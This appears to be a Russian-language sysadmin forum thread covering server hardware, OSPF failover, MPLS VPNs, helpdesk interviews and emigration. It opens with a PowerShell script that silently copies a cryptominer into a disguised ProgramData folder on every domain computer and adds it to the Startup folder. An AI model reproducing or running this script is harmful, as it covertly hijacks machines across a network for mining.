$colPropList){$objSearcher.PropertiesToLoad.Add($i)} $colResults = $objSearcher.FindAll() #тут мы перебираем все ПК по циклу пк1-пк2-пк3 итд foreach ($objResult in $colResults) { $objComputer = $objResult.Properties $objComputer.name #тут мы задаём пути КУДА скопировать майнер, я бы не брал папку windows так как из неё нихера не запускается $path1="\\"+$objComputer.name+"\C$\ProgramData\system86" #эта папка АВТОЗАГРУЗКИ для всех пользователей windows, запускается при старте системы $path2="\\"+$objComputer.name+"\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\" #тут мы показываем что и куда копировать Copy-Item -ErrorAction SilentlyContinue -Path "\\SMBshara\miner\system86\" -Destination "$path1" -Recurse Copy-Item -ErrorAction SilentlyContinue "\\SMBshara\miner\system86.lnk" -Destination "$path2" } Ну без прав админа ты не сможешь это разлить удалённом, можешь конечно кидать руками
>>1151084 > Да, белый, белый, доступен из внешнего мира > Вопрос не про IP, а про то какими средствами и как он это реализует, без привязок и прочей хуйни Dhcp option 82 вроде бы. Передаёт на dhcp сервер идентификатор коммутатора и номер порта.
У меня два вопроса про IP-KVM (IPMI, Supermicro, на понты денег нет). 1. Там есть интеграция с Active Directory, точно есть. А Single Sign On работает? //Это я и сам могу проверить, но если кто знает - хорошо, меньше глупых и бесплодных попыток. 2. Предположим, привезли новый, чистый, голый сервер. Нам известны его GUID, MAC-адреса каждой сетевой карты, включая KVM-ную. Все. В принципе, достаточно. Адреса со всеми настройками сети выдать везде, в т.ч. на KVM-порту - не вопрос. Установить ОС как надо, из шаблона и с Desired State Configuration по сети - не вопрос. А автоматизировать настройку всякой херни, включая доменную авторизацию пользователей IPMI - можно? //Это я проверить не могу, не на чем. Не сносить же один из серваков подчистую для дурацкого эксперимента? Так, на будущее интересуюсь.
>>1150487 >Будешь на аутсорсе обслуживать европейских заказчиков. Это охуенно же. Богатая инфраструктура с нормальными серверами и оборудованием, от сотни до нескольких тысяч серверов у клиентов, десятки тысяч пользователей, иностранные коллеги, прокачиваешь английский, командировки в Европу. > ... > эмигрируешь > PROFIT
>>1151164 Правда скучновато, я понимаю, что российский маня бизнес - это хуёво, но только в рашке у нас и линукс и сети и виндувс и БД и всё делает один человек, а в Европе под каждый пук отдельный
>>1151169 >мальски крупной компании не так. Знаю, но не всегда, в конторе из 5-6 ойтишников на 500 человек (что считается нормой) будет 3-4 эникея и 2-3 Шивы, которые будут делать всё Работаю в ИБ в конторе с 6к пользователей, так я и линукса настраиваю и энтерпрайз админ, и запросы к ексчейндж пишу на повершелл, в общем тоже Шива
>>1151173 >Работаю в ИБ в конторе с 6к пользователей так я и линукса настраиваю и энтерпрайз админ, и запросы к ексчейндж пишу на повершелл, в общем тоже Шива это очень странное положение вещей. У нас ИБ это ИБ, виндоадмины это виндоадмины, сетевики это сентевики, телефонисты тоже отдельно. эникеи отдельно. Базы данных отдельно. Разработка отдельно.
>>1151149 >А автоматизировать настройку всякой херни >Адреса со всеми настройками сети выдать везде, в т.ч. на KVM This. Раз адрес выдается, а не вписывается, он тебе известен. Дальше командуй ему че хошь с дефолтным паролем.
>>1151176 У нас также, но когда ты оказываешься более квалифицированным, чем отдел линуксойдов у аутсорса, то невольно начинаешь делать сам, аналогично с виндой, я могу написать скрипт на повершелл сам, а могу попросить виндузятника, но в первом случае я понимаю, что я делаю и что получу Друзья ИБшники такие же, один настраивает циски, имеет CCNA, хотя с знаниями CCNP, а всё ещё тоже безопасник, другой тоже безопасник, а занимается пентестами, и логично занимается хацканьем чужих сетей используя свои знания Если ваши безопасники только могут катать писули - они тупые
>>1151195 ну так это получается ты линукса настраиваешь и винду админишь не с подачи руководства, а исходя из того, что тебе самому так хочется, как я понял. А так у тебя есть в конторе и сетевики, и админы.
У нас, например, ИБ только мониторингом занимаются и бумажными делами. Циски и линукса не настраивают и не лезут туда.
>>1151218 В ойти вернусь, или в ИТ ИБ с пентестами, хацканьем и подобным, может в ITSM подамся, но уж точно сидеть и весь день торговать ебалом в DLP не буду Плюс ойтишной работы - весело, железки, спуфинг, сидишь как свинья грязный по уши в шеллах, сел в 10 утра, а встал уже за полночь Плюс манагерской работы - есть свободное время, сказал, что на встречу и съебался по своим делам или домой я так три года на встречи ездил, кек. Построил поддержку, и начал сам себе планы на год рисовать, никто не понимает, какую хуйню ты делаешь, что умные цели, на деле довольно простые, и реализуются по щелчку пальцев, нарисовал время выполнение заявки 30 минут, а на деле там и 2 минутами не пахнет, и снижай по 2-3-4 минуты раз в два года, а всё оптимизация, а потом сделаешь продление сертификата для сайта и почты по акции, А сам пишешь "оптимизация расходов выделяемых на конфиденциальность приватности данных" или вместо ИТ отдел писать "отдел инфраструктуры внутреннего ИТ развития", ох бля, короче я веселился, когда руководил своим ИТ отделом в одной параше, да, может обратно в руководители ИТ отдела попробую податься
Есть одна мать. Корпус 2U, охлаждение - кассета из 3-х вентиляторов 80мм. Разъемы 1-4,A,B справа налево, подключены 1,2,A. Фены 1 и 2 дуют на процы и память, фен А - на чипсет. Так вот, вентилятор на разъеме 1 не то чтоб вразнос, но крутится на полных оборотах. В то время как вентилятор на разъеме 2 показывает от силы 2000. Есть четыре режима работы. Full Speed: F1 - 6.9K, F2, FA - 7.1...7.2K Standard Speed: F1 - 7.1...7.2K, F2 - 2.2K, FA - 3K Optimal Speed: F1 - 7.2K, F2 - 1.8K, FA - 3.1K Heavy I/O: F1 - 7.1...7.2K, F2 - 1.6K, FA - 6.1K (ну понятно, за чипсет он один в ответе). Для сравнения, на втором таком же серваке все трое работают более-менее на равных оборотах. Регуляторы оборотов внутренние. Я только что поменял местами F1 и F2, картина та же, первый разъем на полную, второй сачкует. Нет, подключение кассеты правильное, при изъятии F1 датчик показывал, что изъят именно F1, для F2 - соответственно, F2. Что может быть? Термодатчик для F2 мозги ебет?
>>1151529 >Термодатчик Опять же, температура процов, памяти, чипсета адекватная и на обоих более-менее одинаковая. Так что термодатчик-то в норме, скорее всего. А как должен вести себя регулятор оборотов, если сигнал от термометра на него не поступает или поступает с помехами? Может, криворукие сборщики при установке кассеты одну из жилок перебили?
>>1151538 Надо будет остановить, да кассету на другие разъемы подключить. Если что-то изменится, значит, с термодатчика лажа идет. Если не изменится - значит, где-то кабель поврежден.
>>1150408 "Кому ты там нужен?" - неправильная постановка вопроса. В России вы тоже не особо кому-то нужны. Чувствуешь в себе силу и уверен в себе - езжай. Вот и все. Если иметь за бугром статус разрешающий работать - безработным не останешься.
>>1152296 Канада. Австралия. Можно просто приехать по программе, если заморочиться с подтверждением опыта и сдачей экзаменов по языку. США - пока есть лотерея. Ну и просто рабочие визы и собеседования никто не отменял.
>>1151965 Может быть. Но а)>>1151538 >температура процов, памяти, чипсета адекватная и на обоих (серваках) более-менее одинаковая Если судить все по той же сводке с датчиков, там 33...35 градусов. Что, в общем, не показатель, температура как раз может и удерживаться только потому что первый фен все время на полных оборотах. б) Каждый из фенов на "цифровых" разъемах дует сразу на оба проца. в) Судя по мануалу, в секции "Установка радиаторов" с термопастой экспериментировать вообще запрещено. Так и сказано, мол, пленочку с подошвы сняли - и сразу ставьте, там намазано столько, сколько нужно.
>>1152299 >Ну и просто рабочие визы и собеседования никто не отменял Вопрос: ты обладаешь такой квалификацией, чтобы американский работодатель станет заморачиваться ради того, чтобы нанять такого специалиста, как ты? При этом у него будет понимание, что на своем рынке такого специалиста найти сложно. Ответь.
>>1151445 >сесурно нерабочим Поясняй вопрос, что это значит Если это публичный ключ, то нерабочий это значит, что бы его не мог открыть закрытый? То есть достаточно подменить ключ? Но тогда он не будет подписан закрытым ключом. Если ты удалишь или изменишь хоть один символ ключа, то будет отличается его HMAC если я верно помню название чексуммы Поэтому поясняй что хочешь и куда сделать
>>1152369 Могут какую угодно хуйню и чушь спросить "Типа мне вчера настроили доступ на удаленную шару, а сегодня не работает, что за хуйня" - да иди нахуй пидрила, свечку не держал, могу настроить только нормально занова.
>>1152369 Ты хочешь пойти на обычную первую линию поддержки пользователя? Поддержка по телефону, дистанционная или принять заявку и подойти?
Если ты про HD эникейный, то общие вопросы - что такое DHCP, что такое Proxy, что такое DNS, VPN Почему может не работать интернет, типы IP адресов (белый, серый (192.168/16 172.16/12 10.0/8), 169.254/8 - линклокал и локалхост 127.0/8) что такое маска подсети и для чего нужна, вряд ли попросят её рассчитать, но можешь глянуть основные команды в windows - ping, tracert, ipconfig Ну и модель оси, просто иметь представление
Это наверное минимальный набор техпода
Давай подробнее куда идёшь и на какой техпод, и я тебе подробнее распишу
>>1152377 Первая линия, по телефону. Иду в компанию у которой своё йоба ПО и которая обслуживает клиентов этого ПО за ПО сказали похуй, с ним обращаться научат. Главное уметь в обслуживание офисной техники и вот этого всего
>>1152380 А, ну смотря какое ПО и с чем оно работает, если как-то связано с настройками интернета, тогда то, что я писал выше, если один-эсс, тогда могут спросить про то как будите удалённо подключаться, что такое IP адрес, что такое HOSTNAME Могут дать задачку: Как с ПК1 подключиться к ПК2, если ПК1 192.168.1.10/24, а ПК2 192.168.2.10/24 - ответ типа сделать пинг, или попробовать по SMB (\\192.168.2.19), если пинга и подключения нет, при этом ПК1 в сети и сеть видит, то отправить вопрос самому заказчику, чтобы обеспечил доступ/маршрутизацию до ПК
Какие требования у работодателя, ты хоть перечень напиши, что у них в поиске соискателя написано
>>1152301 Я это к тому что говорилось о неких сборщиках до этого. Мало ли. Ну тогда вообще-то это может быть из-за недостаточной мощности БП. Неправильно рассчитана. А еще может так быть с наступлением холодов электросеть не выполняет договор и поставляет электричество с заниженным напряжением. Мой рекорд- 150 В. Ниже уже идет постоянная перезагрузка.
>>1152549 >Мало ли А, ну так с процом ошибиться сложно, разве что очень сильный дядька попадется и вкорячит его поперек сокета. А с кассетой легко, там только внутри все чисто, чтоб анус фены можно было на ходу дергать. А снаружи торчат обычные тоненькие кабели из четырех жил. Защемили один такой между кассетой и матерью и привет. А то что сразу не заметили - ну, бывает. При старте-то они минут пять ревут как "штука" в пикировании, пока post проходит. На каникулах уже покопаюсь. Обороты штатные, людей там все равно нет, на уши давить некому.
>>1152312 В принципе, да. Незаменимых, конечно, нет. Но у меня довольно высокая квалификация. Разумеется, из Индии привезти человека проще, но шансы есть всегда.
Что говорить техподдержке провайдера чуваку, чтобы он понял, что ему звонит не Антон Уральский, что у меня реально проблемы с интернетом, и что я уже включал и выключал роутер.
>>1153117 Я говорю состояние индикаторов подключения кабелей, есть ли связь до основного шлюза, ешё говорю что пробовал выходить на связь что через маршрутизатор, что с напрямую подключенным к компу кабелем. Перед этим на всякий случай пингую 8.8.8.8 и kremlin.ru
>>1153117 Когда я начинал работать с техпода провайдера, то обычно шарящие чуваки говорили: у меня не работает интернет, не идёт/идёт пинг до туда, пингую по IP, с двух+ устройств, антивирус выключен, пробовал напрямую, аплинк до вашего коммутатора есть
>>1153374 >Кардиохирург В Штатах Обама убил элитность профессии врача - зарплата упала в разы и очень многие разъехались по домам.
>>1153374 >Что ты такое делаешь? Какой-нибудь специалист по машинному обучению с красным дипломом Мехмата - их в Яндексе много и почти все со временем уезжают за бугор.
>>1153382 >Какой-нибудь специалист по машинному обучению с красным дипломом Мехмата - их в Яндексе много и почти все со временем уезжают за бугор. Аааа ну если тот анон такой, то Welcome to USA, но почему-то у меня сомнения.
>>1153384 На самом деле уехать просто, если у тебя свободный английский и нет родственников, которых надо содержать. Просто ищешь работу за бугром, также как и на hh.ru проходишь сначала удаленное собеседование, потом один раз - очное. Конечно, выбор вакансий меньше, а требования выше, т.к. ты будешь обходиться компании дороже, но не настолько выше, чтобы у среднего админа не было никаких шансов. Гораздо чаще всё упирается в язык/семью...
>>1153389 Это слишком сложный вопрос, чтобы на него можно было вообще ответить. Сколько людей - столько и историй...
Есть те, кто здесь работали на заводах всякими ведущими инженерами и получали копейки, уехали туда и там работают тоже на заводах, но обычными работягами. Живут спокойно, ни в чем нужды не испытывают и уверены, что на пенсии не будут голодать. С одной стороны это такой профессиональный дауншифт, с другой они уровень своей жизни при этом явно улучшили...
Бывают, кто едет без образования и навыков - работает там в сфере обслуживания (официант, фастфуд) и если здесь им приходилось выживать на копейки, то там они имеют тот же уровень жизни без всяких напрягов.
А вот тех, кто бы имея здесь высокий уровень жизни, уехав, значительно бы его улучшил и правда мало - в основном топовые востребованные специалисты. Однако всё равно - это уровень среднего класса, миллионером что здесь, что там, работая на дядю, стать невозможно - не нужно себя обманывать! Другое дело, что там больше возможностей для открытия бизнеса, для инвестирования, для того, чтобы банально накопить хоть какой-то начальный капитал.
Хотя сами, что американцы, что европейцы, при всём при этом живут 100% в кредит, который автоматически закрывается работодателем, путем зачисления зарплаты на кредитный счет. ЛОЛ, да? Просто людям в голову не приходит, что можно напрячься, накопить денег и начать инвестировать/вести свое дело - зачем, если они уже хорошо живут и уверены в том, что будут обеспечены в старости? Плюс там нет такого расслоения по доходам в обществе как у нас, т.е. люди менее завистливые и у них меньше мотивации стремиться сделать головокружительную карьеру и/или стать миллионерами.
>>1153394 Там есть понятие среднего класса, вот старый пик, типа % от зарплаты цены iphone x в разных странах. Если тут я считаюсь успешным с своими жалкими 120к в месяц, за которые убиваюсь на двух работах, то в США - 3к долларов - это зарплата охранника. Многие начнут спорить о том, что там американцы платят из налоги, подавая каждый год декларацию, могу парировать тем, что в рашке мы помимо 13% из ЗП платим ещё 30% от работодателя на каждый выплаченный рубль, итого с 100к государство в чистом виде получает 43к, а на оставшиеся 87к рублей (100к -13%, и 30% взносов от работодателя) мы покупаем товары и услуги с 18% НДС, фактически из выплаченных суммарно 143к работодателям мы имеем только 71400, ага, маньки, это чуть меньше половины средств И это гениально работает, так как рабы не думают о том, сколько на самом деле государство с них берёт денег. Так вот, возвращаясь к среднему классу, по всем критериям среднего класса, я с своими жалкими 120к в месяц даже близко не могу с ним стоять, мне как минимум надо увеличить зарплату в два раза, чтобы я мог быть среднем классом, с поправкой на курс, в свою очередь будучи виндоцисколинуксоидом я бы мог получать больше примерное в 1.5-2 раза https://www.tupa-germania.ru/rabota/zarplata-it-germania.html
Да, там были бы другие цены, что-то дешевле, что-то дороже, но я был бы уверен, что мои фантики деньги будут иметь покупательскую способность, что если я останусь без работы моё государство меня не бросит, короче был бы более социально защищён
>>1153402 В ДС и ДС2 уровень жизни примерно сопоставим с Европейским. А чаще и выше, чем европейский. Это факт. Касательно США соглашусь. Но если ты из ДС и работаешь за 120к и имеешь жилье, то есть ли смысл перекатываться в США, снимать там хибару, не иметь толком друзей и быть мигрантом из России? Сомневаюсь.
В России произошел крупный сбой в работе кассовых аппаратов. Об этом сообщает РИА «Новости».
Уточняется, что из-за поломки закрыли часть магазинов российского ретейлера «Магнит». С подобными проблемами столкнулись и заправки «ЛУКойла», «Газпром нефти», а также сети магазинов «Мария-Ра», «Аникс», «Ярче», «Автоштрих» и DNS.
В Федеральной налоговой службе рассказали, что в таком случае торговые точки вправе проводить расчеты без этой техники. Однако после того как система вновь заработает, продавцы обязаны будут сформировать кассовый чек коррекции с общей суммой неучтенной выручки.
В свою очередь в компании Group-IB пояснили, что массовый сбой касс мог произойти из-за проблем в прошивке нового ПО.
____________________ ____________________
Никто не работает с кассовым оборудованием? Что это было?
>>1153415 Живу в ДС с женой, суммарно зарабатываем 150к. Сестра жены живет в пригороде Вены, работает полдня. Так вот они с мужем суммарно и зарабатывают намного больше и живут заметно лучше. Интересно, что мы в ДС делаем не так?
>>1153402 Про налоги у нас ты хорошо, что напомнил. Действительно это грабеж самый натуральный. Чтобы платить сотруднику 100к в месяц на руки, работодатель должен еще около 60к заплатить государству. При этом все товары стоят на 18% дороже из-за НДС. Т.е. получается, что с каждого созданного нашим трудом рубля, государство забирает себе почти три четверти... Налог в 75% - это что-то с чем-то. Не удивительно, что он поделен на части и сокрыт от простых людей, ведь если человеку выдать на руки 100к, а потом заставить 75к сдать обратно - люди сразу поймут что к чему!
>>1153428 Давеча тут упоминался некий мерзкий чЯтик, который зачем-то купили на смену исправно работавшему жабберу. В Реестре его нет, 100%. А вот чего в Реестре нашел: https://www.dlg.im/ru/download/enterprise Кто-то использовал, не? Просто клиент доступен, а сервер по запросу, даже цены нет.
>>1153506 Практика показывает, что запретить людям пользоваться теми чатиками, которыми они привыкли, - абсолютно нереальная задача. Хуже того, та же слака настолько удобна и функциональна, что ни одна закрытая альтернатива не может сравниться. И это касается любого популярного социального ПО. Силовые попытки запрета, обычно, выливаются в нелояльность со стороны продвинутых и прошаренных сотрудников и их стремительный отток из компании...
>>1153543 Так это ты еще графика приезжающих не видел! Вот только если уезжают молодые специалисты выпускники топовых ВУЗов, то приезжают таджики всякие...
>>1153559 Я бы поделил московские технические ВУЗы на 4 ранга: S - МГУ (мехмат, ВМК, физфак), Физтех A - Бауманка, МИФИ... B - МИРЭА, МАИ... C - все прочие
Так вот A и S - это топовые. Некоторые специальности, некоторых факультетов в B - тоже топчик. То есть в ДС от трети до половины всех выпускников технарей попадают в категорию выпускников топовых ВУЗов.
>>1153564 Ну это меньше соответствует реалиям. Сам заканчивал МИРЭА - там на одной кафедре давали просто потрясающую подготовку по тем то временам! А на соседней кафедре не учили вообще ничему...
>>1153565 Годовой курс дискретной математики. Курс архитектуры сетевых протоколов и отдельный курс сетей. Отдельные семестровые курсы по функциональному и процедурному программированию, а также два семестра ассемблера и ООП. Годовой курс по архитектуре операционных систем (на примере unix).
Короче, помимо программирования у меня была и приличная такая база общеайтишных предметов. При том эта подготовка была одинаковой и для АСУшников, и для кодеров, и для всех остальных на IT факультете (тогда в МИРЭА он еще ВМС назывался, если что).
>>1153540 Госконтора же. Иначе стал бы я в реестр Минсвязи лазить. А силовая замена состоялась раньше, при внедрении мерзкой хуиты вместо жабы. Хуиты нет в реестре, а это есть. Может, и слак есть, не долистал пока.
>>1153588 >Pinging 8.8.8.8 with 1400 bytes of data: Reply from 8.8.8.8: bytes=1400 time=115ms TTL=50 Reply from 8.8.8.8: bytes=1400 time=114ms TTL=50 Reply from 8.8.8.8: bytes=1400 time=115ms TTL=50 Reply from 8.8.8.8: bytes=1400 time=115ms TTL=50
Ping statistics for 8.8.8.8: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 114ms, Maximum = 115ms, Average = 114ms
>>1153592 Ответ от 8.8.8.8: число байт=1400 время=4мс TTL=57 Ответ от 8.8.8.8: число байт=1400 время=4мс TTL=57 Ответ от 8.8.8.8: число байт=1400 время=4мс TTL=57 Ответ от 8.8.8.8: число байт=1400 время=4мс TTL=57
Начитался тут смехуечков про halt по ssh. И вот какой вопрос: а защита от дурака есть? Т.е. пользователю с правом на, допустим, halt, при вводе halt хотя бы выдавался запрос на ввод пароля, причём не пользовательского, а на конкретную операцию. И только после этого, убедившись, что пользователь трезв и в своём уме, система бы выполняла именно то, что приказали. Необязательно halt, другие критичные команды.
>>1153601 root@TEST:/# ls -la /sbin/ | grep halt lrwxrwxrwx 1 root root 14 Oct 26 14:59 halt -> /bin/systemctl Вот, сделай его chmod только для рута, типа как 600, и хватит
>>1153605 Это понятно. Разрешения меняются не в целом, а в зависимости от того, вошли мы локально или удаленно? По-любому должна быть такая фишка. Уж если винда в терминальной сессии предупреждает: вы не разлогиниться собрались, а выключить меня, потом придётся прийти и включить кнопкой.
>>1153608 См. выше. Возможно, пользователю и разрешено это, но тогда, когда есть шанс все исправить с прямым доступом. Не только выключение. Так, можно радостно включить ненастроенный файерволл с единственным правилом deny all.
Как искать работу студентишку? Входные данные - полгода опыта и умение писать фронт на vue, знакомство с реактом ну и плюс всякая кроссбраузерная, адаптивная и прочая верстко-хуйня, а еще скиллы питона с джангой. Хочу устроиться хоть стажером, хоть джуном, на парт-тайм часов 30-35 в неделю но на хх полторы вакансии с частичной занятостью или стажировкой, мб я что-то не так ищу? хелп ми, аноны :с
>>1153846 По знакомству. Дураков выкладывать вакансии для студней на ХХ, а потом отбиваться от долбоебов нет. Нет друга, который приведет тебяв контору за ручку, пиздуй в телеграм чат по своему вую и просись на стажировку.
>>1153678 Похуй, ценник на жизнь что там что там однохуйственный. >>1153790 В Питере жизнь спокойнее, москвичи бегают как в жопу выебанные и вечно никуда не успевают.
>>1153678 в ДС, конечно, тут возможностей больше, сможешь поменять работу на ещё более выгодную спустя пару месяцев, а Питер он как был провинцией, так и осталя
>>1149761 (OP) поясните как именно зарубили в ссср наше направление микроэлектроники и кибернетического развития? читал где то книгу (па психалогии кажись) в которой чувак приводил рассказ другого чувака как он в 60-х годах бегал по всем высшим советам (он имел туда вход) и кода решался вопрос развития этой отрасли - русские (совки ващет) решили что это НЕ НУЖНО. что это бесовщина. и типа чувак тот, который метался и жопу рвал что бы это развивали - вот тогда он понял как тупо и дебильно устроено общество. как оно психически нездорово.
помните такую книги? что можете за тему пояснить? интересую конкретные воспоминания, статьи, источники, пруфы.
мы могли бы не уступать муррике в этом направлении развития если бы не решили сами свернуть наш проект (который кстати опережал их)
>>1154103 Ну как бы да. Хотя формально вы должны как раз отчитаться, что вообще эти адреса используете, вплоть до того, что расписать для чего вам какой адрес, т.е. обосновать RIPE, что они вам нужны. Плюс провайдер не примет от вас анонсы слишком коротких префиксов, т.е. если ваша аска маленькая, то придется анонсировать ее всю или половину/четверть. Наконец, в чем смысл зажопить часть адресов? Внутри вы можете и серыми пользоваться.
>>1153572 Заканчивал СибГУТИ в Новосибирске, программа образовательная похоже что была точно такой же как у тебя. Только ещё матанализ и векторная алгебра были.
>>1154258 Линейка и матан у нас тоже, конечно, были - по два года, а также еще по семестру: ТФКП и диффуров. Ну и три семестра физики. Но это всё к IT не относится - в любом техническом ВУЗе примерно такие же объемы математики.
>>1154194 >>1154194 >поясните как именно зарубили в ссср наше направление микроэлектроники и кибернетического развития?
В кратце из новейшей истории России: Для промышленности PLC совок пилил сам, и пилил заводы автоматические и как китай копировал гейропейские и пиндоские. т.е купили линию автоматического производства хуйни и накопировали тысячи, и свои PLC туда насовал и институты по разработке. С развала совка siemens понял что ему эта конкуренция нахуй не нужна и с помощью взяток, демпинга и нечестной конкуренции завалил институт по разработке промышленной автоматики.
>>1154636 >разобраться и со свичами. Научиться и их настраивать ) Там где нужно настраивать свичи, твоих знаний по настройке "роутеров" поднять PPPoE, DHCP, WiFi и тыкнуть на save - это нихуя не умение настраивать роутеры блядь! будет недостаточно.
>>1154684 ты, пожалуйста, не оценивай не зная меня мое умение настраивать роутеры. А я, если хочешь, могу рассказать, чего именно я не знаю про настройку свитчей, что не умею итд. Я вообще-то сейчас говорил о том, что мои знания в датацентрах равны примерно нулю. А не про вланы, спаннинг три, кос и прочий mclag...
Вот такая вот сетка есть, сетевики. RTR1 и RTR2 находятся в AREA0 OSPF. STACK находится в stub-AREA1. Оба RTR анонсируют STACK маршруты по-умолчанию с разными метриками: RTR1 - 100, RTR2 - 200. Каждый RTR подключен к своему провайдеру. На обоих RTR включен тест IP SLA до дефолтного шлюза провайдера.
Что сейчас: весь трафик из LAN в Интернет идёт, очевидно, через RTR1. Если WAN-интерфейс RTR1 отказывает, то этот трафик всё равно идёт в Интернет через RTR1, который перенаправляет их на RTR2, ну а тот уже шлёт пакеты куда надо. Всё это происходит, потому что анонсы LSA3 дефолтных маршрутов для stub-зон не зависят от наличия на анонсирующем ABR маршрута по-умолчанию, и STACK нихуя не узнаёт о том, у его дефолтного шлюза уже нет маршрута в Интернет.
Что нужно: если дохнет провайдер RTR1, STACK начинает использовать в качестве шлюза по-умолчанию RTR2.
Чего не хочется: 1. Делать AREA1 нормальной зоной с последующим анонсированием обоими RTRами маршрутов по-умолчанию с помощью LSA5; 2. Перебарщивать со списками контроля анонсов.
Такие дела, коллеги. Пока что склоняюсь к решению плюнуть на это дело, ибо время хождения пакета по сети увеличивается не так уж и сильно. Но, всё-таки, чёт НИКРАСИВА мне.
Посоны, а вы встречали тяночек системных администраторок? Или сетевых инженерок? Короче, чтобы возились с компьютерами и сетями. И чтобы не жирухи/фемки/лесби были
>>1155321 Блин. Ну вот так всегда. А как же хочется няшную системную администраторочку, чтобы няшиться с ней ночными сменами на диванчике в серверной под синтвейв в свете мигающих светодиодных индикаторов...
>>1149761 (OP) может, задам платиновый вопрос, но: что из IT учить, если я не собираюсь полностью становиться погромистом? Работаю в офисе, международная торговля, есть время учить всякое, но не уверен, есть ли язык программирования, который пригодится неайтишнику. Мне один знакомый говорит, SQL обмазываться, но он сам только учить начал, сам продаваном работает, поэтому я у вас лучше спрошу. Перефразируя вопрос, знание какой IT области сделает меня более ценным специалистом в "аналоговых" специальностях, типа логистики, аудита, хуй знает куда ещё занести может, но вы поняли.
>>1155599 Ну, если рассуждать логически, то не чистому айтишнику нужны от айти в первую очередь инструменты автоматизации какой-нибудь своей автоматизируемой рутины. Следовательно нужно что-то максимум прикладное, чтобы решать подобные задачи. Из всех ЯП что я знаю (я на самом деле нихуя не спец) самый прикладной питон. его и учи, дальше не пропадёшь.
>>1149761 (OP) Где можно найти удаленку part time маня админу-сетевику? Могу циски и жужиперы, могу пердолить линухи немного и писать всякое говно на питоне
>>1155639 >Где можно найти удаленку part time маня админу-сетевику? Ох уж и не знаю. Пытался я как-то найти подобное. Но это либо настройка д-линка за три копейки, либо компьютерная помощь. Админом можно на удаленке разве что линукс пердолить. Сетевиком найти довольно проблематично. Во всех компаниях, где нужны сетевики, они уже есть в штате. А там, где сетевики не нужны на фул тайм, они и на парт тайм не нужны.
>>1155091 Зачем тебе вообще здесь две зоны оспф? Разрулить ситуацию можно либо с помощью протоколов HSRP/GLBP, либо с помощью технологии OER/PFR. Последнюю, настоятельно рекомендую.
>>1155606 >питоне не сложный Я тоже так думал, пока не столкнулся с лямбдами в декораторах для обертывания конструкторов/методов в ООП. Конечно, можно этим и не пользоваться, но тогда и рассчитывать на приличную работу не стоит. Плюс в пайтоне дохуя либ, без знания которых этот язык просто нахуй не нужен.
>>1155091 >аршрутов для stub-зон не зависят от наличия на анонсирующем ABR маршрута по-умолчанию, и STACK нихуя не узнаёт о том, у его дефолтного шлюза уже нет маршрута в Интернет. Как насчет того, чтобы использовать reliable conditional default routing?
>>1155668 >Конечно, можно этим и не пользоваться, но тогда и рассчитывать на приличную работу не стоит. Плюс >в пайтоне дохуя либ, без знания которых этот язык просто нахуй не нужен. Я так понял, что анон, который изначально задал вопрос, вообще не работает в ИТ. Так что он и не планирует работать программером. Я правда не понимаю, зачем ему вообще что-то подобное изучать. Не проще ли сосредоточится на своих хард скиллз
Двачерсы, поясните мне про L2 VPN, про всякие там VPLS или MPLS и IPoE, вот с L3 VPN уровня point TO point всё ясно, есть сервер, есть клиент, начал читать про VPLS и в ужасе охуел насколько это сложно, сложнее любого BGP. Короче, объясните как для пятилетнего, что это как и куда работает, можете подогнать сравнительный анализ, в чём плюсы и тп, вообще расскажите для тупого и с самого начала, где используется в чём плюхи в отличии от L3, я так полагаю, плюхи в том, что удобен при site to site
>>1155682 Про то как работает vpn в MPLS сетях я тебе не расскажу - сам не знаю. Но L3 от L2 в данном случае отличается только одним - в первом случае ты гонишь по своей провайдерской сети ip кадры, а во втором - эзернет фреймы. Сама MPLS сеть при этом никак не меняется, только инкапсуляция.
Преимущество L2vpn очевидно - тебе не нужно делать маршрутизацию внутри своей сети, т.е. удаленные площадки будут в одном L2 сегменте - всякие виндовые файлшары будут работать, как будто компы рядом стоят.
>>1155671 Хард скилы важны, конечно, но со временем без навыков автоматизации и программирования будет всё сложнее и сложнее найти хорошую работу - сети, серверные, ПО растут и усложняются постоянно при том по экспоненте, соответственно, старые подходы к управлению и администрированию с каждым днем всё менее и менее эффективны. И пайтон - отличный старт, чтобы окунуться во всё это, но не нужно думать, что это простой язык. Если уж учить язык, то серьезно, иначе просто не получится его эффективно использовать в работе.
Что-то я последнее время стал зависать на принятии элоементарных решений. Чаю выпить или кофе? Надеть синюю рубашку или серую водолазку? Сейчас выбираю, какой Windows Server 2016 ставить, русский или английский. Прям выбор века, блеадь. Раньше обычно английские ставил. Но тут на работе уже два сервера под виндой есть и оба русскоязычные, как-то не хочется увеличивать зоопарк языков. Зато английский привычнее. Но сейчас на 2000 год, когда у локализованных систем была куча глюков и жмячне было ставить "чистую" английскую. Сейчас они все "чистые".
>>1155695 >тебе не нужно делать маршрутизацию внутри своей сети То есть оно будет как буд-то единые ВЛАНЫ и тп? Я смогу гнать, условно, VLAN 10 из одного филиала в VLAN 10 в другом филиале, используя транки, и это всё будет работать как локальная сеть? Но вроде как всякие OpenVPN тоже могут передавать теги вланов. Ладно, в одном случае инкапсулируется фрейм, а куда, в UDP пакет? или куда его суют? В другом случае сам пакет, так же суётся в другой UDP?
>>1155699 Да, это будет как единый L2 сегмент - хочешь можешь одни и те же вланы между площадками растягивать.
Куда там что инкапсулируется не знаю, но там всё несколько сложнее. Суть в том, что под каждого клиента заводится свой vrf в него заворачивается клиентский трафик, внутри же сети обычно нет bgp, а используется маршрутизация по меткам LSP, что и является основой MPLS сети при том для каждого клиентского vrf свои тунели строятся, т.к. точки подключения к провайдеру у разных клиентов не совпадают, очевидно. Использование меток позволяет ускорить маршрутизацию и иметь внутри провайдерской сети оборудование без BGP - это дешевле и сама сеть более простая. Ну а vrf-ы позволяют разделить трафик клиентов, чтобы он не пересекался.
>>1155709 >Оно там есть конечно, но только на пограничных маршрутизаторах. а как же утверджение "BGP is the BESP IGP"? В ДЦ сетях активно продвигается BGP в качестве внутреннего протокола маршрутизации. Со всеми этими Spine-leaf топологиями
>>1155756 Ну в spine-leaf ты по-другому и не сможешь организовать масштабирование. Но в провайдерских сетях из многих сотен и тысяч маршрутизаторов держать BGP на каждом из них просто невозможно - там же для iBGP нужно соседство каждого с каждым, ну или конфедерации и роут-рефлекторы внутри них. MPLS для того и придумали, чтобы не использовать BGP внутри сети.
